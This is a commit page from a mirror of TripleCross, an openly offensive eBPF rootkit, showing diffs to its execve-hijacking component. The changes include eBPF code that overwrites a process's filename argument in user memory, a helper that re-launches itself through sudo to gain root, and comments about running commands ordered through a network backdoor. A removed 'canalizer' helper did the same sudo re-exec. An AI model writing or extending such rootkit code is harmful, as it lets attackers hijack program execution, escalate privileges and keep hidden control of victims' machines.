admin/TripleCross
1
0
Fork 0
mirror of https://github.com/h3xduck/TripleCross.git synced 2025-12-16 23:33:06 +08:00
Code Issues Packages Projects Releases Wiki Activity

Now the execve hijacker works without needing a canalizer. Removed it. Also some additional tweaks to the c&c launching of the helper

Browse Source
This commit is contained in:
h3xduck
2022-02-19 11:57:32 -05:00
parent 8e97624326
commit 1ec4ed8486
12 changed files with 2072 additions and 2086 deletions
Download Patch File Download Diff File Expand all files Collapse all files

BIN
src/.output/kit.o
View File

Binary file not shown.

4112
src/.output/kit.skel.h
View File

File diff suppressed because it is too large Load Diff

BIN
src/bin/kit
View File

Binary file not shown.

2
src/common/constants.h
View File

@@ -19,7 +19,7 @@
#define STRING_FS_SUDOERS_ENTRY_LEN 37
//EXECUTION HIJACKING
#define PATH_EXECUTION_HIJACK_PROGRAM "/home/osboxes/TFG/src/helpers/execve_hijack_canalizer\0"
#define PATH_EXECUTION_HIJACK_PROGRAM "/home/osboxes/TFG/src/helpers/execve_hijack\0"
#endif

1
src/ebpf/include/bpf/exec.h
View File

@@ -77,7 +77,6 @@ static __always_inline int test_write_user_unique(struct sys_execve_enter_ctx *c
bpf_probe_write_user((void*)(ctx->filename), (void*)org_filename, 1);
return -1;
}
bpf_printk("Char was %u\n", argv_c);
//Everything went fine, but let's fix our modification anyways since the next write to user memory, which
//implies more bytes, may fail.
bpf_probe_write_user((void*)(ctx->filename), (void*)org_filename, 1);

10
src/helpers/Makefile
View File

@@ -3,13 +3,7 @@ HEADERS = lib/RawTCP.h
EXTRA_CFLAGS= -I$(PWD)/lib
default:
make execve_hijack execve_hijack_canalizer
execve_hijack_canalizer.o: execve_hijack_canalizer.c
gcc -c execve_hijack_canalizer.c
execve_hijack_canalizer: execve_hijack_canalizer.o
gcc -o execve_hijack_canalizer execve_hijack_canalizer.o
make execve_hijack
execve_hijack.o: execve_hijack.c $(HEADERS)
gcc -c execve_hijack.c
@@ -20,5 +14,3 @@ execve_hijack: execve_hijack.o lib/libRawTCP_Lib.a
clean:
-rm -f execve_hijack.o
-rm -f execve_hijack
-rm -f execve_hijack_canalizer.o
-rm -f execve_hijack_canalizer

BIN
src/helpers/execve_hijack
View File

Binary file not shown.

20
src/helpers/execve_hijack.c
View File

@@ -64,8 +64,22 @@ char* getLocalIpAddress(){
return IPbuffer;
}
int main(int argc, char* argv[]){
int main(int argc, char* argv[], char *envp[]){
printf("Hello world from execve hijacker\n");
for(int ii=0; ii<argc; ii++){
printf("Argument %i is %s\n", ii, argv[ii]);
}
if(geteuid() != 0){
//We do not have privileges, but we do want them. Let's rerun the program now.
char* args[argc+1];
args[0] = "sudo";
for(int ii=0; ii<argc; ii++){
args[ii+1] = argv[ii];
}
execve("/usr/bin/sudo", args, envp);
}
time_t rawtime;
struct tm * timeinfo;
@@ -74,10 +88,6 @@ int main(int argc, char* argv[]){
timeinfo = localtime ( &rawtime );
char* timestr = asctime(timeinfo);
for(int ii=0; ii<argc; ii++){
printf("Argument %i is %s\n", ii, argv[ii]);
}
//We proceed to fork() and exec the original program, whilst also executing the one we
//ordered to execute via the network backdoor
//int bpf_map_fd = bpf_map_get_fd_by_id()

BIN
src/helpers/execve_hijack.o
View File

Binary file not shown.

BIN
src/helpers/execve_hijack_canalizer
View File

Binary file not shown.

11
src/helpers/execve_hijack_canalizer.c
View File

@@ -1,11 +0,0 @@
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main(int argc, char* argv[], char *envp[]){
printf("Hello world from the canalizer\n");
char* args[] = {"sudo", "/home/osboxes/TFG/src/helpers/execve_hijack", NULL};
execve("/usr/bin/sudo", args, envp);
return 0;
}

BIN
src/helpers/execve_hijack_canalizer.o
View File

Binary file not shown.